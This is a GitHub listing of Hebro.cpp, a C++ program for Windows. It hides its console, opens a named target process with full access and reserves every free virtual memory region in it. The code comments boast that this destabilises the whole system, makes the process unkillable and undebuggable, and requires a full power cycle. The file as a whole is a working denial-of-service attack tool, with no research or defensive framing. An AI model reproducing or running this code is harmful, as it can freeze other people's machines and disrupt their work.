-
Notifications
You must be signed in to change notification settings - Fork 0
/
Hebro.cpp
110 lines (87 loc) · 2.79 KB
/
Hebro.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#include <Windows.h>
#include <stdio.h>
#include <type_traits>
#include <algorithm>
#include <numbers>
#include <chrono>
#include <thread>
#include <Windows.h>
#include "HebroHelper.h"
namespace pointer
{
template <typename T>
T AlignTop(const void* anyPointer, size_t alignment)
{
union
{
const void* as_void;
uintptr_t as_uintptr_t;
T as_T;
};
as_void = anyPointer;
const size_t mask = alignment - 1u;
as_uintptr_t += mask;
as_uintptr_t &= ~mask;
return as_T;
}
template <typename T, typename U>
T Offset(void* anyPointer, U howManyBytes)
{
union
{
void* as_void;
char* as_char;
T as_T;
};
as_void = anyPointer;
as_char += howManyBytes;
return as_T;
}
}
void HideConsole()
{
::ShowWindow(::GetConsoleWindow(), SW_HIDE);
}
int main(int argc, char* argv[] )
{
HideConsole();
int pid = 0;
pid = getPID(argv[1]);
if (pid != 0) {
HANDLE proc = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
const size_t alignment = 64u * 1024u;
// chosen to make the loop "overflow", starting from 0x0 again.
// this will reserve every possible memory region in the target process.
// once everything has been reserved, the call to ::VirtualAllocEx will hang and never return.
// this creates instability across the whole Windows system, making it impossible to kill this process, or sometimes even start new processes.
// Rebooting no longer works.
// Debugging this process doesn't work.
// A full power cycle is required!
const void* addressStart = (const void*)0x00007FFF7FF00000;
const void* addressEnd = (const void*)0x000080007FF00000;
for (const void* address = addressStart; address < addressEnd; /* nothing */)
{
// align address to be scanned
address = pointer::AlignTop<const void*>(address, alignment);
::MEMORY_BASIC_INFORMATION memoryInfo = {};
const size_t bytesReturned = ::VirtualQueryEx(proc, address, &memoryInfo, sizeof(::MEMORY_BASIC_INFORMATION));
// we are only interested in free pages
if ((bytesReturned > 0u) && (memoryInfo.State == MEM_FREE))
{
const size_t bytesLeft = abs((intptr_t*)addressEnd - (intptr_t*)memoryInfo.BaseAddress);
const size_t size = std::min<size_t>(memoryInfo.RegionSize, bytesLeft);
//printf("baseAddress: 0x%p, size: 0x%llX\n", memoryInfo.BaseAddress, size);
void* baseAddress = ::VirtualAllocEx(proc, memoryInfo.BaseAddress, size, MEM_RESERVE, PAGE_NOACCESS);
if (baseAddress)
{
//printf("Reserving virtual memory region at 0x%p with size 0x%llX\n", baseAddress, size);
}
}
// keep on searching
address = pointer::Offset<const void*>(memoryInfo.BaseAddress, memoryInfo.RegionSize);
}
::CloseHandle(proc);
return 0;
}
return 0;
}